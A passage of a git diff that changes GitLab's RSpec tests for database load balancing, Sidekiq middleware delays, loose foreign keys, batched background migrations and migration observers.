expect(middleware).not_to receive(:sleep) + + run_middleware + end + end + + context 'when replica is not up to date' do + before do + Gitlab::Database::LoadBalancing.each_load_balancer do |lb| + allow(lb).to receive(:select_up_to_date_host).and_return(false, true) + end + end + + it 'sleeps until the minimum delay is reached' do + expect(middleware).to receive(:sleep).with(be_within(0.01).of(described_class::MINIMUM_DELAY_INTERVAL_SECONDS - elapsed_time)) + + run_middleware + end + end + end + + context 'when delay interval has elapsed' do + let(:elapsed_time) { described_class::MINIMUM_DELAY_INTERVAL_SECONDS + 0.3 } + + it 'does not sleep' do + expect(middleware).not_to receive(:sleep) + + run_middleware + end + end + + context 'when created_at is in the future' do + let(:elapsed_time) { -5 } + + it 'does not sleep' do + expect(middleware).not_to receive(:sleep) + + run_middleware + end + end end end @@ -146,10 +198,24 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ include_context 'data consistency worker class', :always, :load_balancing_for_test_data_consistency_worker include_examples 'stick to the primary', 'primary' + + context 'when delay interval has not elapsed', :freeze_time do + let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'wal_locations' => wal_locations, "created_at" => Time.current.to_f - elapsed_time } } + let(:elapsed_time) { described_class::MINIMUM_DELAY_INTERVAL_SECONDS - 0.3 } + + it 'does not sleep' do + expect(middleware).not_to receive(:sleep) + + run_middleware + end + end end context 'when worker data consistency is :delayed' do - include_examples 'sticks based on data consistency', :delayed + include_context 'data consistency worker class', :delayed, :load_balancing_for_test_data_consistency_worker + + include_examples 'sticks based on data consistency' + include_examples 'sleeps when necessary' context 'when replica is not up to date' do before do @@ -177,7 +243,7 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ end context 'when job is retried' do - let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'database_replica_location' => '0/D525E3A8', 'retry_count' => 0 } } + let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'wal_locations' => wal_locations, 'retry_count' => 0 } } context 'and replica still lagging behind' do include_examples 'stick to the primary', 'primary' @@ -195,7 +261,10 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ end context 'when worker data consistency is :sticky' do - include_examples 'sticks based on data consistency', :sticky + include_context 'data consistency worker class', :sticky, :load_balancing_for_test_data_consistency_worker + + include_examples 'sticks based on data consistency' + include_examples 'sleeps when necessary' context 'when replica is not up to date' do before do @@ -255,7 +324,7 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ end def run_middleware - middleware.call(worker, job, double(:queue)) { yield } + middleware.call(worker, job, double(:queue)) { yield if block_given? } rescue described_class::JobReplicaNotUpToDate # we silence errors here that cause the job to retry end diff --git a/spec/lib/gitlab/database/load_balancing/sticking_spec.rb b/spec/lib/gitlab/database/load_balancing/sticking_spec.rb index d88554614cf..f3139bb1b4f 100644 --- a/spec/lib/gitlab/database/load_balancing/sticking_spec.rb +++ b/spec/lib/gitlab/database/load_balancing/sticking_spec.rb @@ -256,15 +256,6 @@ RSpec.describe Gitlab::Database::LoadBalancing::Sticking, :redis do expect(sticking.last_write_location_for(:user, 4)).to be_nil end - - it 'removes the old key' do - Gitlab::Redis::SharedState.with do |redis| - redis.set(sticking.send(:old_redis_key_for, :user, 4), 'foo', ex: 30) - end - - sticking.unstick(:user, 4) - expect(sticking.last_write_location_for(:user, 4)).to be_nil - end end describe '#last_write_location_for' do @@ -273,14 +264,6 @@ RSpec.describe Gitlab::Database::LoadBalancing::Sticking, :redis do expect(sticking.last_write_location_for(:user, 4)).to eq('foo') end - - it 'falls back to reading the old key' do - Gitlab::Redis::SharedState.with do |redis| - redis.set(sticking.send(:old_redis_key_for, :user, 4), 'foo', ex: 30) - end - - expect(sticking.last_write_location_for(:user, 4)).to eq('foo') - end end describe '#redis_key_for' do diff --git a/spec/lib/gitlab/database/load_balancing_spec.rb b/spec/lib/gitlab/database/load_balancing_spec.rb index 65ffe539910..45878b2e266 100644 --- a/spec/lib/gitlab/database/load_balancing_spec.rb +++ b/spec/lib/gitlab/database/load_balancing_spec.rb @@ -38,6 +38,24 @@ RSpec.describe Gitlab::Database::LoadBalancing do end end + describe '.primary_only?' do + it 'returns true if all load balancers have no replicas' do + described_class.each_load_balancer do |lb| + allow(lb).to receive(:primary_only?).and_return(true) + end + + expect(described_class.primary_only?).to eq(true) + end + + it 'returns false if at least one has replicas' do + described_class.each_load_balancer.with_index do |lb, index| + allow(lb).to receive(:primary_only?).and_return(index != 0) + end + + expect(described_class.primary_only?).to eq(false) + end + end + describe '.release_hosts' do it 'releases the host of every load balancer' do described_class.each_load_balancer do |lb| diff --git a/spec/lib/gitlab/database/loose_foreign_keys_spec.rb b/spec/lib/gitlab/database/loose_foreign_keys_spec.rb new file mode 100644 index 00000000000..13f2d31bc32 --- /dev/null +++ b/spec/lib/gitlab/database/loose_foreign_keys_spec.rb @@ -0,0 +1,45 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Database::LooseForeignKeys do + describe 'verify all definitions' do + subject(:definitions) { described_class.definitions } + + it 'all definitions have assigned a known gitlab_schema and on_delete' do + is_expected.to all(have_attributes( + options: a_hash_including( + column: be_a(String), + gitlab_schema: be_in(Gitlab::Database.schemas_to_base_models.symbolize_keys.keys), + on_delete: be_in([:async_delete, :async_nullify]) + ), + from_table: be_a(String), + to_table: be_a(String) + )) + end + + describe 'ensuring database integrity' do + def base_models_for(table) + parent_table_schema = Gitlab::Database::GitlabSchema.table_schema(table) + Gitlab::Database.schemas_to_base_models.fetch(parent_table_schema) + end + + it 'all `to_table` tables are present' do + definitions.each do |definition| + base_models_for(definition.to_table).each do |model| + expect(model.connection).to be_table_exist(definition.to_table) + end + end + end + + it 'all `from_table` tables are present' do + definitions.each do |definition| + base_models_for(definition.from_table).each do |model| + expect(model.connection).to be_table_exist(definition.from_table) + expect(model.connection).to be_column_exist(definition.from_table, definition.column) + end + end + end + end + end +end diff --git a/spec/lib/gitlab/database/migration_helpers/loose_foreign_key_helpers_spec.rb b/spec/lib/gitlab/database/migration_helpers/loose_foreign_key_helpers_spec.rb index f1dbfbbff18..25fc676d09e 100644 --- a/spec/lib/gitlab/database/migration_helpers/loose_foreign_key_helpers_spec.rb +++ b/spec/lib/gitlab/database/migration_helpers/loose_foreign_key_helpers_spec.rb @@ -47,11 +47,16 @@ RSpec.describe Gitlab::Database::MigrationHelpers::LooseForeignKeyHelpers do record_to_be_deleted.delete expect(LooseForeignKeys::DeletedRecord.count).to eq(1) - deleted_record = LooseForeignKeys::DeletedRecord.all.first + + arel_table = LooseForeignKeys::DeletedRecord.arel_table + deleted_record = LooseForeignKeys::DeletedRecord + .select(arel_table[Arel.star], arel_table[:partition].as('partition_number')) # aliasing the ignored partition column to partition_number + .all + .first expect(deleted_record.primary_key_value).to eq(record_to_be_deleted.id) expect(deleted_record.fully_qualified_table_name).to eq('public._test_loose_fk_test_table') - expect(deleted_record.partition).to eq(1) + expect(deleted_record.partition_number).to eq(1) end it 'stores multiple record deletions' do diff --git a/spec/lib/gitlab/database/migration_helpers_spec.rb b/spec/lib/gitlab/database/migration_helpers_spec.rb index ea755f5a368..7f80bed04a4 100644 --- a/spec/lib/gitlab/database/migration_helpers_spec.rb +++ b/spec/lib/gitlab/database/migration_helpers_spec.rb @@ -2431,7 +2431,7 @@ RSpec.describe Gitlab::Database::MigrationHelpers do let(:issues) { table(:issues) } def setup - namespace = namespaces.create!(name: 'foo', path: 'foo') + namespace = namespaces.create!(name: 'foo', path: 'foo', type: Namespaces::UserNamespace.sti_name) projects.create!(namespace_id: namespace.id) end diff --git a/spec/lib/gitlab/database/migrations/background_migration_helpers_spec.rb b/spec/lib/gitlab/database/migrations/background_migration_helpers_spec.rb index e42a6c970ea..99c7d70724c 100644 --- a/spec/lib/gitlab/database/migrations/background_migration_helpers_spec.rb +++ b/spec/lib/gitlab/database/migrations/background_migration_helpers_spec.rb @@ -7,78 +7,6 @@ RSpec.describe Gitlab::Database::Migrations::BackgroundMigrationHelpers do ActiveRecord::Migration.new.extend(described_class) end - describe '#bulk_queue_background_migration_jobs_by_range' do - context 'when the model has an ID column' do - let!(:id1) { create(:user).id } - let!(:id2) { create(:user).id } - let!(:id3) { create(:user).id } - - before do - User.class_eval do - include EachBatch - end - end - - context 'with enough rows to bulk queue jobs more than once' do - before do - stub_const('Gitlab::Database::Migrations::BackgroundMigrationHelpers::JOB_BUFFER_SIZE', 1) - end - - it 'queues jobs correctly' do - Sidekiq::Testing.fake! do - model.bulk_queue_background_migration_jobs_by_range(User, 'FooJob', batch_size: 2) - - expect(BackgroundMigrationWorker.jobs[0]['args']).to eq(['FooJob', [id1, id2]]) - expect(BackgroundMigrationWorker.jobs[1]['args']).to eq(['FooJob', [id3, id3]]) - end - end - - it 'queues jobs in groups of buffer size 1' do - expect(BackgroundMigrationWorker).to receive(:bulk_perform_async).with([['FooJob', [id1, id2]]]) - expect(BackgroundMigrationWorker).to receive(:bulk_perform_async).with([['FooJob', [id3, id3]]]) - - model.bulk_queue_background_migration_jobs_by_range(User, 'FooJob', batch_size: 2) - end - end - - context 'with not enough rows to bulk queue jobs more than once' do - it 'queues jobs correctly' do - Sidekiq::Testing.fake! do - model.bulk_queue_background_migration_jobs_by_range(User, 'FooJob', batch_size: 2) - - expect(BackgroundMigrationWorker.jobs[0]['args']).to eq(['FooJob', [id1, id2]]) - expect(BackgroundMigrationWorker.jobs[1]['args']).to eq(['FooJob', [id3, id3]]) - end - end - - it 'queues jobs in bulk all at once (big buffer size)' do - expect(BackgroundMigrationWorker).to receive(:bulk_perform_async).with([['FooJob', [id1, id2]], - ['FooJob', [id3, id3]]]) - - model.bulk_queue_background_migration_jobs_by_range(User, 'FooJob', batch_size: 2) - end - end - - context 'without specifying batch_size' do - it 'queues jobs correctly' do - Sidekiq::Testing.fake! do - model.bulk_queue_background_migration_jobs_by_range(User, 'FooJob') - - expect(BackgroundMigrationWorker.jobs[0]['args']).to eq(['FooJob', [id1, id3]]) - end - end - end - end - - context "when the model doesn't have an ID column" do - it 'raises error (for now)' do - expect do - model.bulk_queue_background_migration_jobs_by_range(ProjectAuthorization, 'FooJob') - end.to raise_error(StandardError, /does not have an ID/) - end - end - end - describe '#queue_background_migration_jobs_by_range_at_intervals' do context 'when the model has an ID column' do let!(:id1) { create(:user).id } @@ -354,161 +282,6 @@ RSpec.describe Gitlab::Database::Migrations::BackgroundMigrationHelpers do end end - describe '#queue_batched_background_migration' do - let(:pgclass_info) { instance_double('Gitlab::Database::PgClass', cardinality_estimate: 42) } - - before do - allow(Gitlab::Database::PgClass).to receive(:for_table).and_call_original - end - - context 'when such migration already exists' do - it 'does not create duplicate migration' do - create( - :batched_background_migration, - job_class_name: 'MyJobClass', - table_name: :projects, - column_name: :id, - interval: 10.minutes, - min_value: 5, - max_value: 1005, - batch_class_name: 'MyBatchClass', - batch_size: 200, - sub_batch_size: 20, - job_arguments: [[:id], [:id_convert_to_bigint]] - ) - - expect do - model.queue_batched_background_migration( - 'MyJobClass', - :projects, - :id, - [:id], [:id_convert_to_bigint], - job_interval: 5.minutes, - batch_min_value: 5, - batch_max_value: 1000, - batch_class_name: 'MyBatchClass', - batch_size: 100, - sub_batch_size: 10) - end.not_to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count } - end - end - - it 'creates the database record for the migration' do - expect(Gitlab::Database::PgClass).to receive(:for_table).with(:projects).and_return(pgclass_info) - - expect do - model.queue_batched_background_migration( - 'MyJobClass', - :projects, - :id, - job_interval: 5.minutes, - batch_min_value: 5, - batch_max_value: 1000, - batch_class_name: 'MyBatchClass', - batch_size: 100, - sub_batch_size: 10) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to have_attributes( - job_class_name: 'MyJobClass', - table_name: 'projects', - column_name: 'id', - interval: 300, - min_value: 5, - max_value: 1000, - batch_class_name: 'MyBatchClass', - batch_size: 100, - sub_batch_size: 10, - job_arguments: %w[], - status: 'active', - total_tuple_count: pgclass_info.cardinality_estimate) - end - - context 'when the job interval is lower than the minimum' do - let(:minimum_delay) { described_class::BATCH_MIN_DELAY } - - it 'sets the job interval to the minimum value' do - expect do - model.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: minimum_delay - 1.minute) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last - - expect(created_migration.interval).to eq(minimum_delay) - end - end - - context 'when additional arguments are passed to the method' do - it 'saves the arguments on the database record' do - expect do - model.queue_batched_background_migration( - 'MyJobClass', - :projects, - :id, - 'my', - 'arguments', - job_interval: 5.minutes, - batch_max_value: 1000) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to have_attributes( - job_class_name: 'MyJobClass', - table_name: 'projects', - column_name: 'id', - interval: 300, - min_value: 1, - max_value: 1000, - job_arguments: %w[my arguments]) - end - end - - context 'when the max_value is not given' do - context 'when records exist in the database' do - let!(:event1) { create(:event) } - let!(:event2) { create(:event) } - let!(:event3) { create(:event) } - - it 'creates the record with the current max value' do - expect do - model.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last - - expect(created_migration.max_value).to eq(event3.id) - end - - it 'creates the record with an active status' do - expect do - model.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to be_active - end - end - - context 'when the database is empty' do - it 'sets the max value to the min value' do - expect do - model.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last - - expect(created_migration.max_value).to eq(created_migration.min_value) - end - - it 'creates the record with a finished status' do - expect do - model.queue_batched_background_migration('MyJobClass', :projects, :id, job_interval: 5.minutes) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to be_finished - end - end - end - end - describe '#migrate_async' do it 'calls BackgroundMigrationWorker.perform_async' do expect(BackgroundMigrationWorker).to receive(:perform_async).with("Class", "hello", "world") @@ -583,7 +356,7 @@ RSpec.describe Gitlab::Database::Migrations::BackgroundMigrationHelpers do end describe '#finalized_background_migration' do - let(:job_coordinator) { Gitlab::BackgroundMigration::JobCoordinator.new(:main, BackgroundMigrationWorker) } + let(:job_coordinator) { Gitlab::BackgroundMigration::JobCoordinator.new(BackgroundMigrationWorker) } let!(:job_class_name) { 'TestJob' } let!(:job_class) { Class.new } @@ -605,7 +378,7 @@ RSpec.describe Gitlab::Database::Migrations::BackgroundMigrationHelpers do job_class.define_method(:perform, job_perform_method) allow(Gitlab::BackgroundMigration).to receive(:coordinator_for_database) - .with(:main).and_return(job_coordinator) + .with('main').and_return(job_coordinator) expect(job_coordinator).to receive(:migration_class_for) .with(job_class_name).at_least(:once) { job_class } diff --git a/spec/lib/gitlab/database/migrations/batched_background_migration_helpers_spec.rb b/spec/lib/gitlab/database/migrations/batched_background_migration_helpers_spec.rb new file mode 100644 index 00000000000..c45149d67bf --- /dev/null +++ b/spec/lib/gitlab/database/migrations/batched_background_migration_helpers_spec.rb @@ -0,0 +1,164 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Database::Migrations::BatchedBackgroundMigrationHelpers do + let(:migration) do + ActiveRecord::Migration.new.extend(described_class) + end + + describe '#queue_batched_background_migration' do + let(:pgclass_info) { instance_double('Gitlab::Database::PgClass', cardinality_estimate: 42) } + + before do + allow(Gitlab::Database::PgClass).to receive(:for_table).and_call_original + end + + context 'when such migration already exists' do + it 'does not create duplicate migration' do + create( + :batched_background_migration, + job_class_name: 'MyJobClass', + table_name: :projects, + column_name: :id, + interval: 10.minutes, + min_value: 5, + max_value: 1005, + batch_class_name: 'MyBatchClass', + batch_size: 200, + sub_batch_size: 20, + job_arguments: [[:id], [:id_convert_to_bigint]] + ) + + expect do + migration.queue_batched_background_migration( + 'MyJobClass', + :projects, + :id, + [:id], [:id_convert_to_bigint], + job_interval: 5.minutes, + batch_min_value: 5, + batch_max_value: 1000, + batch_class_name: 'MyBatchClass', + batch_size: 100, + sub_batch_size: 10) + end.not_to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count } + end + end + + it 'creates the database record for the migration' do + expect(Gitlab::Database::PgClass).to receive(:for_table).with(:projects).and_return(pgclass_info) + + expect do + migration.queue_batched_background_migration( + 'MyJobClass', + :projects, + :id, + job_interval: 5.minutes, + batch_min_value: 5, + batch_max_value: 1000, + batch_class_name: 'MyBatchClass', + batch_size: 100, + sub_batch_size: 10) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to have_attributes( + job_class_name: 'MyJobClass', + table_name: 'projects', + column_name: 'id', + interval: 300, + min_value: 5, + max_value: 1000, + batch_class_name: 'MyBatchClass', + batch_size: 100, + sub_batch_size: 10, + job_arguments: %w[], + status: 'active', + total_tuple_count: pgclass_info.cardinality_estimate) + end + + context 'when the job interval is lower than the minimum' do + let(:minimum_delay) { described_class::BATCH_MIN_DELAY } + + it 'sets the job interval to the minimum value' do + expect do + migration.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: minimum_delay - 1.minute) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last + + expect(created_migration.interval).to eq(minimum_delay) + end + end + + context 'when additional arguments are passed to the method' do + it 'saves the arguments on the database record' do + expect do + migration.queue_batched_background_migration( + 'MyJobClass', + :projects, + :id, + 'my', + 'arguments', + job_interval: 5.minutes, + batch_max_value: 1000) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to have_attributes( + job_class_name: 'MyJobClass', + table_name: 'projects', + column_name: 'id', + interval: 300, + min_value: 1, + max_value: 1000, + job_arguments: %w[my arguments]) + end + end + + context 'when the max_value is not given' do + context 'when records exist in the database' do + let!(:event1) { create(:event) } + let!(:event2) { create(:event) } + let!(:event3) { create(:event) } + + it 'creates the record with the current max value' do + expect do + migration.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last + + expect(created_migration.max_value).to eq(event3.id) + end + + it 'creates the record with an active status' do + expect do + migration.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to be_active + end + end + + context 'when the database is empty' do + it 'sets the max value to the min value' do + expect do + migration.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last + + expect(created_migration.max_value).to eq(created_migration.min_value) + end + + it 'creates the record with a finished status' do + expect do + migration.queue_batched_background_migration('MyJobClass', :projects, :id, job_interval: 5.minutes) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to be_finished + end + end + end + end +end diff --git a/spec/lib/gitlab/database/migrations/instrumentation_spec.rb b/spec/lib/gitlab/database/migrations/instrumentation_spec.rb index 841d2a98a16..902d8e13a63 100644 --- a/spec/lib/gitlab/database/migrations/instrumentation_spec.rb +++ b/spec/lib/gitlab/database/migrations/instrumentation_spec.rb @@ -3,6 +3,7 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Instrumentation do let(:result_dir) { Dir.mktmpdir } + let(:connection) { ActiveRecord::Migration.connection } after do FileUtils.rm_rf(result_dir) @@ -14,11 +15,11 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do let(:migration_version) { '12345' } it 'executes the given block' do - expect { |b| subject.observe(version: migration_version, name: migration_name, &b) }.to yield_control + expect { |b| subject.observe(version: migration_version, name: migration_name, connection: connection, &b) }.to yield_control end context 'behavior with observers' do - subject { described_class.new(observer_classes: [Gitlab::Database::Migrations::Observers::MigrationObserver], result_dir: result_dir).observe(version: migration_version, name: migration_name) {} } + subject { described_class.new(observer_classes: [Gitlab::Database::Migrations::Observers::MigrationObserver], result_dir: result_dir).observe(version: migration_version, name: migration_name, connection: connection) {} } let(:observer) { instance_double('Gitlab::Database::Migrations::Observers::MigrationObserver', before: nil, after: nil, record: nil) } @@ -29,7 +30,7 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do it 'instantiates observer with observation' do expect(Gitlab::Database::Migrations::Observers::MigrationObserver) .to receive(:new) - .with(instance_of(Gitlab::Database::Migrations::Observation), anything) { |observation| expect(observation.version).to eq(migration_version) } + .with(instance_of(Gitlab::Database::Migrations::Observation), anything, connection) { |observation| expect(observation.version).to eq(migration_version) } .and_return(observer) subject @@ -63,7 +64,7 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do end context 'on successful execution' do - subject { described_class.new(result_dir: result_dir).observe(version: migration_version, name: migration_name) {} } + subject { described_class.new(result_dir: result_dir).observe(version: migration_version, name: migration_name, connection: connection) {} } it 'records walltime' do expect(subject.walltime).not_to be_nil @@ -83,7 +84,7 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do end context 'upon failure' do - subject { described_class.new(result_dir: result_dir).observe(version: migration_version, name: migration_name) { raise 'something went wrong' } } + subject { described_class.new(result_dir: result_dir).observe(version: migration_version, name: migration_name, connection: connection) { raise 'something went wrong' } } it 'raises the exception' do expect { subject }.to raise_error(/something went wrong/) @@ -93,7 +94,7 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do subject { instance.observations.first } before do - instance.observe(version: migration_version, name: migration_name) { raise 'something went wrong' } + instance.observe(version: migration_version, name: migration_name, connection: connection) { raise 'something went wrong' } rescue StandardError # ignore end @@ -125,8 +126,8 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do let(:migration2) { double('migration2', call: nil) } it 'records observations for all migrations' do - subject.observe(version: migration_version, name: migration_name) {} - subject.observe(version: migration_version, name: migration_name) { raise 'something went wrong' } rescue nil + subject.observe(version: migration_version, name: migration_name, connection: connection) {} + subject.observe(version: migration_version, name: migration_name, connection: connection) { raise 'something went wrong' } rescue nil expect(subject.observations.size).to eq(2) end diff --git a/spec/lib/gitlab/database/migrations/observers/query_details_spec.rb b/spec/lib/gitlab/database/migrations/observers/query_details_spec.rb index 191ac29e3b3..5a19ae6581d 100644 --- a/spec/lib/gitlab/database/migrations/observers/query_details_spec.rb +++ b/spec/lib/gitlab/database/migrations/observers/query_details_spec.rb @@ -2,10 +2,10 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Observers::QueryDetails do - subject { described_class.new(observation, directory_path) } + subject { described_class.new(observation, directory_path, connection) } + let(:connection) { ActiveRecord::Migration.connection } let(:observation) { Gitlab::Database::Migrations::Observation.new(migration_version, migration_name) } - let(:connection) { ActiveRecord::Base.connection } let(:query) { "select date_trunc('day', $1::timestamptz) + $2 * (interval '1 hour')" } let(:query_binds) { [Time.current, 3] } let(:directory_path) { Dir.mktmpdir } diff --git a/spec/lib/gitlab/database/migrations/observers/query_log_spec.rb b/spec/lib/gitlab/database/migrations/observers/query_log_spec.rb index 2e70a85fd5b..7b01e39f5f1 100644 --- a/spec/lib/gitlab/database/migrations/observers/query_log_spec.rb +++ b/spec/lib/gitlab/database/migrations/observers/query_log_spec.rb @@ -2,10 +2,10 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Observers::QueryLog do - subject { described_class.new(observation, directory_path) } + subject { described_class.new(observation, directory_path, connection) } let(:observation) { Gitlab::Database::Migrations::Observation.new(migration_version, migration_name) } - let(:connection) { ActiveRecord::Base.connection } + let(:connection) { ActiveRecord::Migration.connection } let(:query) { 'select 1' } let(:directory_path) { Dir.mktmpdir } let(:migration_version) { 20210422152437 } diff --git a/spec/lib/gitlab/database/migrations/observers/query_statistics_spec.rb b/spec/lib/gitlab/database/migrations/observers/query_statistics_spec.rb index 9727a215d71..2515f0d4a06 100644 --- a/spec/lib/gitlab/database/migrations/observers/query_statistics_spec.rb +++ b/spec/lib/gitlab/database/migrations/observers/query_statistics_spec.rb @@ -2,10 +2,10 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Observers::QueryStatistics do - subject { described_class.new(observation, double("unused path")) } + subject { described_class.new(observation, double("unused path"), connection) } let(:observation) { Gitlab::Database::Migrations::Observation.new } - let(:connection) { ActiveRecord::Base.connection } + let(:connection) { ActiveRecord::Migration.connection } def mock_pgss(enabled: true) if enabled diff --git a/spec/lib/gitlab/database/migrations/observers/total_database_size_change_spec.rb b/spec/lib/gitlab/database/migrations/observers/total_database_size_change_spec.rb index e689759c574..4b08838d6bb 100644 --- a/spec/lib/gitlab/database/migrations/observers/total_database_size_change_spec.rb +++ b/spec/lib/gitlab/database/migrations/observers/total_database_size_change_spec.rb @@ -2,10 +2,10 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Observers::TotalDatabaseSizeChange do - subject { described_class.new(observation, double('unused path')) } + subject { described_class.new(observation, double('unused path'), connection) } let(:observation) { Gitlab::Database::Migrations::Observation.new } - let(:connection) { ActiveRecord::Base.connection } + let(:connection) { ActiveRecord::Migration.connection } let(:query) { 'select pg_database_size(current_database())' } it 'records the size change' do diff --git a/spec/lib/gitlab/database/migrations/observers/transaction_duration_spec.rb b/spec/lib/gitlab/database/migrations/observers/transaction_duration_spec.rb index e65f89747c4..b26bb8fbe41 100644 --- a/spec/lib/gitlab/database/migrations/observers/transaction_duration_spec.rb +++ b/spec/lib/gitlab/database/migrations/observers/transaction_duration_spec.rb @@ -2,8 +2,9 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Observers::TransactionDuration do - subject(:transaction_duration_observer) { described_class.new(observation, directory_path) } + subject(:transaction_duration_observer) { described_class.new(observation, directory_path, connection) } + let(:connection) { ActiveRecord::Migration.connection } let(:observation) { Gitlab::Database::Migrations::Observation.new(migration_version, migration_name) } let(:directory_path) { Dir.mktmpdir } let(:log_file) { "#{directory_path}/#{migration_version}_#{migration_name}-transaction-duration.json" } @@ -78,17 +79,17 @@ RSpec.describe Gitlab::Database::Migrations::Observers::TransactionDuration do end def run_real_transactions - ActiveRecord::Base.transaction do + ApplicationRecord.transaction do end end def run_sub_transactions - ActiveRecord::Base.transaction(requires_new: true) do + ApplicationRecord.transaction(requires_new: true) do end end def run_transaction - ActiveRecord::Base.connection_pool.with_connection do |connection| + ApplicationRecord.connection_pool.with_connection do |connection| Gitlab::Database::SharedModel.using_connection(connection) do Gitlab::Database::SharedModel.transaction do Gitlab::Database::SharedModel.transaction(requires_new: true) do diff --git a/spec/lib/gitlab/database/migrations/runner_spec.rb b/spec/lib/gitlab/database/migrations/runner_spec.rb index 52fb5ec2ba8..4616bd6941e 100644 --- a/spec/lib/gitlab/database/migrations/runner_spec.rb +++ b/spec/lib/gitlab/database/migrations/runner_spec.rb @@ -76,7 +76,7 @@ RSpec.describe Gitlab::Database::Migrations::Runner do it 'runs the unapplied migrations in version order', :aggregate_failures do up.run - expect(migration_runs.map(&:dir)).to eq([:up, :up]) + expect(migration_runs.map(&:dir)).to match_array([:up, :up]) expect(migration_runs.map(&:version_to_migrate)).to eq(pending_migrations.map(&:version)) end end @@ -101,7 +101,7 @@ RSpec.describe Gitlab::Database::Migrations::Runner do it 'runs the applied migrations for the current branch in reverse order', :aggregate_failures do down.run - expect(migration_runs.map(&:dir)).to eq([:down, :down]) + expect(migration_runs.map(&:dir)).to match_array([:down, :down]) expect(migration_runs.map(&:version_to_migrate)).to eq(applied_migrations_this_branch.reverse.map(&:version)) end end diff --git a/spec/lib/gitlab/database/partitioning/detached_partition_dropper_spec.rb b/spec/lib/gitlab/database/partitioning/detached_partition_dropper_spec.rb index b2c4e4b54a4..2ef873e8adb 100644 --- a/spec/lib/gitlab/database/partitioning/detached_partition_dropper_spec.rb +++ b/spec/lib/gitlab/database/partitioning/detached_partition_dropper_spec.rb @@ -90,18 +90,6 @@ RSpec.describe Gitlab::Database::Partitioning::DetachedPartitionDropper do expect(table_oid('test_partition')).to be_nil end - context 'when the drop_detached_partitions feature flag is disabled' do - before do - stub_feature_flags(drop_detached_partitions: false) - end - - it 'does not drop the partition' do - dropper.perform - - expect(table_oid('test_partition')).not_to be_nil - end - end - context 'removing foreign keys' do it 'removes foreign keys from the table before dropping it' do expect(dropper).to receive(:drop_detached_partition).and_wrap_original do |drop_method, partition_name| diff --git a/spec/lib/gitlab/database/partitioning/partition_manager_spec.rb b/spec/lib/gitlab/database/partitioning/partition_manager_spec.rb index 1c6f5c5c694..5e107109fc9 100644 --- a/spec/lib/gitlab/database/partitioning/partition_manager_spec.rb +++ b/spec/lib/gitlab/database/partitioning/partition_manager_spec.rb @@ -16,7 +16,7 @@ RSpec.describe 